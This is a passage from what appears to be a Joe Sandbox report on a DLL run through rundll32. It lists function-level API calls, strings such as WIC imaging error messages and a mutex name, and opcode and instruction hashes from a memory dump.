                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateErrorEventLast
                                                                                                                                  • String ID: pContext
                                                                                                                                  • API String ID: 545576003-2046700901
                                                                                                                                  • Opcode ID: 42b5dbdf8eda4b2c455cc789c80ec8349dee69830d3ecf34cc683787c419d0fc
                                                                                                                                  • Instruction ID: 283d216a7e4af24190be7bf82e7f8adf411ba26f4bda3e69259a960c5ce149d9
                                                                                                                                  • Opcode Fuzzy Hash: 42b5dbdf8eda4b2c455cc789c80ec8349dee69830d3ecf34cc683787c419d0fc
                                                                                                                                  • Instruction Fuzzy Hash: F621B261B09B0A82FF35EFA6E4641B922A5FF88B81F449031CE4E477A1EE6CE505C350
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Stringtry_get_function
                                                                                                                                  • String ID: LCMapStringEx
                                                                                                                                  • API String ID: 2588686239-3893581201
                                                                                                                                  • Opcode ID: 2c2403fb9563f7bc7397c608fcf11f09139fd6e6f523df1d40ae67460aaeaa86
                                                                                                                                  • Instruction ID: 8d8c47a90357194dd5e07a229d1d42afc99d460c1f4ccbcbc71eb69bae4a004e
                                                                                                                                  • Opcode Fuzzy Hash: 2c2403fb9563f7bc7397c608fcf11f09139fd6e6f523df1d40ae67460aaeaa86
                                                                                                                                  • Instruction Fuzzy Hash: D5214C36B08B8186E770CF96B4502AAB7A5FBC9B80F544236EA8D53B59CF3CD5408B00
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateInstance
                                                                                                                                  • String ID: %s - CoCreateInstance on CLSID_WICImagingFactory failed$CNvAnimatedGifStreamEncoderWIC::initialize
                                                                                                                                  • API String ID: 542301482-3781439623
                                                                                                                                  • Opcode ID: d3b19091ed0324d88df89671fc1af45145660e2e85ad139f3cdde19376e2d69d
                                                                                                                                  • Instruction ID: 6826a84480b699cb229868323871a6d47e9962b0142ce82c7d84a5a4efdbff5f
                                                                                                                                  • Opcode Fuzzy Hash: d3b19091ed0324d88df89671fc1af45145660e2e85ad139f3cdde19376e2d69d
                                                                                                                                  • Instruction Fuzzy Hash: CC118E32B08A4682FB208FA5F8603A963A4FB48B88F444035DB5C57768DF7DD855D700
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateInstance
                                                                                                                                  • String ID: %s - CoCreateInstance on CLSID_WICImagingFactory failed,$CNvWICImageDecoder::initialize
                                                                                                                                  • API String ID: 542301482-2443861360
                                                                                                                                  • Opcode ID: 93a664d948b0c99a7ed7cf4bc5cc02cfd8e37e51f5e31fbc025b1db1ec8abdb6
                                                                                                                                  • Instruction ID: c0faa29616bfedca44f2e1aff18e05b694765f9f1b8aa527ede22190a70e1d65
                                                                                                                                  • Opcode Fuzzy Hash: 93a664d948b0c99a7ed7cf4bc5cc02cfd8e37e51f5e31fbc025b1db1ec8abdb6
                                                                                                                                  • Instruction Fuzzy Hash: 4911BF32B08A4582FB20CFA9F86026973A4FB48B88F590436DB8D53768DF7EE540D700
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateMutexObjectSingleWait
                                                                                                                                  • String ID: ngx_update_api
                                                                                                                                  • API String ID: 3113225513-3046468762
                                                                                                                                  • Opcode ID: b200ed883b0c8e5db8df49f2f841541eb5b53eb944261d028a2ff164a3302a24
                                                                                                                                  • Instruction ID: 802c9092777f514c0d0a6f9a0733987f51d9150b8940c8853399bb9ce1abf76c
                                                                                                                                  • Opcode Fuzzy Hash: b200ed883b0c8e5db8df49f2f841541eb5b53eb944261d028a2ff164a3302a24
                                                                                                                                  • Instruction Fuzzy Hash: D1E09272F05B0182FF35DFB6A8601393295EB48B51B188135C91D56380EE3DA095C300
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_7ffd92db0000_rundll32.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                  • Opcode ID: 7e5c6a5d257a954f4ece03d72a07074d059db0adc786de0da86780d6e63026fc
                                                                                                                                  • Instruction ID: 1831daa147605a6ecb3b35d6704de58c37bb171ba5af7c16c13913e51db67b3d
                                                                                                                                  • Opcode Fuzzy Hash: 7e5c6a5d257a954f4ece03d72a07074d059db0adc786de0da86780d6e63026fc
                                                                                                                                  • Instruction Fuzzy Hash: 2741C125B09B4686FA30DFE6A8A067962A4BF99BC1F01043ADD0F97B61DF7DE4419700
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.4601850792.00007FFD92DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFD92DB0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$FreeLocal
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1627422176-0
                                                                                                                                  • Opcode ID: fe9ce48e8071581b44f4e0b6b5a870179f355a3f0ac14cbea2713b9be3281c90
                                                                                                                                  • Instruction ID: 09ad259729151909d124520da52196d86d078c333dcba630c277befed381edd6
                                                                                                                                  • Opcode Fuzzy Hash: fe9ce48e8071581b44f4e0b6b5a870179f355a3f0ac14cbea2713b9be3281c90
                                                                                                                                  • Instruction Fuzzy Hash: 3321F531F0864282FB749B96B5A417E5294EF89BE1F481239EE1E43BD5DE6DE8918300